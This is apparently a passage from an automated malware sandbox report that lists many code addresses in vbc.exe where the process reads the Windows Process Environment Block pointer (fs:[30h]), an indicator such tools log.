Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F3540 mov eax, dword ptr fs:[00000030h] 4_2_055F3540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05623D40 mov eax, dword ptr fs:[00000030h] 4_2_05623D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559C577 mov eax, dword ptr fs:[00000030h] 4_2_0559C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559C577 mov eax, dword ptr fs:[00000030h] 4_2_0559C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05648D34 mov eax, dword ptr fs:[00000030h] 4_2_05648D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563E539 mov eax, dword ptr fs:[00000030h] 4_2_0563E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A4D3B mov eax, dword ptr fs:[00000030h] 4_2_055A4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A4D3B mov eax, dword ptr fs:[00000030h] 4_2_055A4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A4D3B mov eax, dword ptr fs:[00000030h] 4_2_055A4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557AD30 mov eax, dword ptr fs:[00000030h] 4_2_0557AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055FA537 mov eax, dword ptr fs:[00000030h] 4_2_055FA537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h] 4_2_05583D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0563FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0563FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0563FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0563FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05628DF1 mov eax, dword ptr fs:[00000030h] 4_2_05628DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6DC9 mov eax, dword ptr fs:[00000030h] 4_2_055F6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6DC9 mov eax, dword ptr fs:[00000030h] 4_2_055F6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6DC9 mov eax, dword ptr fs:[00000030h] 4_2_055F6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6DC9 mov ecx, dword ptr fs:[00000030h] 4_2_055F6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6DC9 mov eax, dword ptr fs:[00000030h] 4_2_055F6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6DC9 mov eax, dword ptr fs:[00000030h] 4_2_055F6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558D5E0 mov eax, dword ptr fs:[00000030h] 4_2_0558D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558D5E0 mov eax, dword ptr fs:[00000030h] 4_2_0558D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AFD9B mov eax, dword ptr fs:[00000030h] 4_2_055AFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AFD9B mov eax, dword ptr fs:[00000030h] 4_2_055AFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056405AC mov eax, dword ptr fs:[00000030h] 4_2_056405AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056405AC mov eax, dword ptr fs:[00000030h] 4_2_056405AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2581 mov eax, dword ptr fs:[00000030h] 4_2_055A2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2581 mov eax, dword ptr fs:[00000030h] 4_2_055A2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2581 mov eax, dword ptr fs:[00000030h] 4_2_055A2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2581 mov eax, dword ptr fs:[00000030h] 4_2_055A2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05572D8A mov eax, dword ptr fs:[00000030h] 4_2_05572D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05572D8A mov eax, dword ptr fs:[00000030h] 4_2_05572D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05572D8A mov eax, dword ptr fs:[00000030h] 4_2_05572D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05572D8A mov eax, dword ptr fs:[00000030h] 4_2_05572D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05572D8A mov eax, dword ptr fs:[00000030h] 4_2_05572D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A1DB5 mov eax, dword ptr fs:[00000030h] 4_2_055A1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A1DB5 mov eax, dword ptr fs:[00000030h] 4_2_055A1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A1DB5 mov eax, dword ptr fs:[00000030h] 4_2_055A1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A35A1 mov eax, dword ptr fs:[00000030h] 4_2_055A35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AA44B mov eax, dword ptr fs:[00000030h] 4_2_055AA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560C450 mov eax, dword ptr fs:[00000030h] 4_2_0560C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560C450 mov eax, dword ptr fs:[00000030h] 4_2_0560C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559746D mov eax, dword ptr fs:[00000030h] 4_2_0559746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6C0A mov eax, dword ptr fs:[00000030h] 4_2_055F6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6C0A mov eax, dword ptr fs:[00000030h] 4_2_055F6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6C0A mov eax, dword ptr fs:[00000030h] 4_2_055F6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6C0A mov eax, dword ptr fs:[00000030h] 4_2_055F6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h] 4_2_05631C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0564740D mov eax, dword ptr fs:[00000030h] 4_2_0564740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0564740D mov eax, dword ptr fs:[00000030h] 4_2_0564740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0564740D mov eax, dword ptr fs:[00000030h] 4_2_0564740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055ABC2C mov eax, dword ptr fs:[00000030h] 4_2_055ABC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056314FB mov eax, dword ptr fs:[00000030h] 4_2_056314FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6CF0 mov eax, dword ptr fs:[00000030h] 4_2_055F6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6CF0 mov eax, dword ptr fs:[00000030h] 4_2_055F6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F6CF0 mov eax, dword ptr fs:[00000030h] 4_2_055F6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05648CD6 mov eax, dword ptr fs:[00000030h] 4_2_05648CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558849B mov eax, dword ptr fs:[00000030h] 4_2_0558849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05648F6A mov eax, dword ptr fs:[00000030h] 4_2_05648F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558EF40 mov eax, dword ptr fs:[00000030h] 4_2_0558EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558FF60 mov eax, dword ptr fs:[00000030h] 4_2_0558FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559F716 mov eax, dword ptr fs:[00000030h] 4_2_0559F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AA70E mov eax, dword ptr fs:[00000030h] 4_2_055AA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AA70E mov eax, dword ptr fs:[00000030h] 4_2_055AA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559B73D mov eax, dword ptr fs:[00000030h] 4_2_0559B73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559B73D mov eax, dword ptr fs:[00000030h] 4_2_0559B73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0564070D mov eax, dword ptr fs:[00000030h] 4_2_0564070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0564070D mov eax, dword ptr fs:[00000030h] 4_2_0564070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AE730 mov eax, dword ptr fs:[00000030h] 4_2_055AE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560FF10 mov eax, dword ptr fs:[00000030h] 4_2_0560FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560FF10 mov eax, dword ptr fs:[00000030h] 4_2_0560FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05574F2E mov eax, dword ptr fs:[00000030h] 4_2_05574F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05574F2E mov eax, dword ptr fs:[00000030h] 4_2_05574F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B37F5 mov eax, dword ptr fs:[00000030h] 4_2_055B37F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F7794 mov eax, dword ptr fs:[00000030h] 4_2_055F7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F7794 mov eax, dword ptr fs:[00000030h] 4_2_055F7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F7794 mov eax, dword ptr fs:[00000030h] 4_2_055F7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05588794 mov eax, dword ptr fs:[00000030h] 4_2_05588794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h] 4_2_05587E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h] 4_2_05587E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h] 4_2_05587E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h] 4_2_05587E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h] 4_2_05587E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h] 4_2_05587E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563AE44 mov eax, dword ptr fs:[00000030h] 4_2_0563AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563AE44 mov eax, dword ptr fs:[00000030h] 4_2_0563AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h] 4_2_0559AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h] 4_2_0559AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h] 4_2_0559AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h] 4_2_0559AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h] 4_2_0559AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558766D mov eax, dword ptr fs:[00000030h] 4_2_0558766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AA61C mov eax, dword ptr fs:[00000030h] 4_2_055AA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AA61C mov eax, dword ptr fs:[00000030h] 4_2_055AA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557C600 mov eax, dword ptr fs:[00000030h] 4_2_0557C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557C600 mov eax, dword ptr fs:[00000030h] 4_2_0557C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557C600 mov eax, dword ptr fs:[00000030h] 4_2_0557C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A8E00 mov eax, dword ptr fs:[00000030h] 4_2_055A8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0562FE3F mov eax, dword ptr fs:[00000030h] 4_2_0562FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05631608 mov eax, dword ptr fs:[00000030h] 4_2_05631608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557E620 mov eax, dword ptr fs:[00000030h] 4_2_0557E620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A36CC mov eax, dword ptr fs:[00000030h] 4_2_055A36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B8EC7 mov eax, dword ptr fs:[00000030h] 4_2_055B8EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0562FEC0 mov eax, dword ptr fs:[00000030h] 4_2_0562FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05648ED6 mov eax, dword ptr fs:[00000030h] 4_2_05648ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A16E0 mov ecx, dword ptr fs:[00000030h] 4_2_055A16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055876E2 mov eax, dword ptr fs:[00000030h] 4_2_055876E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05640EA5 mov eax, dword ptr fs:[00000030h] 4_2_05640EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05640EA5 mov eax, dword ptr fs:[00000030h] 4_2_05640EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05640EA5 mov eax, dword ptr fs:[00000030h] 4_2_05640EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560FE87 mov eax, dword ptr fs:[00000030h] 4_2_0560FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F46A7 mov eax, dword ptr fs:[00000030h] 4_2_055F46A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559B944 mov eax, dword ptr fs:[00000030h] 4_2_0559B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559B944 mov eax, dword ptr fs:[00000030h] 4_2_0559B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557B171 mov eax, dword ptr fs:[00000030h] 4_2_0557B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557B171 mov eax, dword ptr fs:[00000030h] 4_2_0557B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557C962 mov eax, dword ptr fs:[00000030h] 4_2_0557C962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579100 mov eax, dword ptr fs:[00000030h] 4_2_05579100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579100 mov eax, dword ptr fs:[00000030h] 4_2_05579100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579100 mov eax, dword ptr fs:[00000030h] 4_2_05579100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A513A mov eax, dword ptr fs:[00000030h] 4_2_055A513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A513A mov eax, dword ptr fs:[00000030h] 4_2_055A513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05594120 mov eax, dword ptr fs:[00000030h] 4_2_05594120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05594120 mov eax, dword ptr fs:[00000030h] 4_2_05594120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05594120 mov eax, dword ptr fs:[00000030h] 4_2_05594120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05594120 mov eax, dword ptr fs:[00000030h] 4_2_05594120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05594120 mov ecx, dword ptr fs:[00000030h] 4_2_05594120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056041E8 mov eax, dword ptr fs:[00000030h] 4_2_056041E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557B1E1 mov eax, dword ptr fs:[00000030h] 4_2_0557B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557B1E1 mov eax, dword ptr fs:[00000030h] 4_2_0557B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557B1E1 mov eax, dword ptr fs:[00000030h] 4_2_0557B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h] 4_2_056349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h] 4_2_056349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h] 4_2_056349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h] 4_2_056349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2990 mov eax, dword ptr fs:[00000030h] 4_2_055A2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559C182 mov eax, dword ptr fs:[00000030h] 4_2_0559C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AA185 mov eax, dword ptr fs:[00000030h] 4_2_055AA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h] 4_2_055F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h] 4_2_055F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h] 4_2_055F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h] 4_2_055F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov eax, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov eax, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov eax, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov eax, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F69A6 mov eax, dword ptr fs:[00000030h] 4_2_055F69A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A61A0 mov eax, dword ptr fs:[00000030h] 4_2_055A61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A61A0 mov eax, dword ptr fs:[00000030h] 4_2_055A61A0
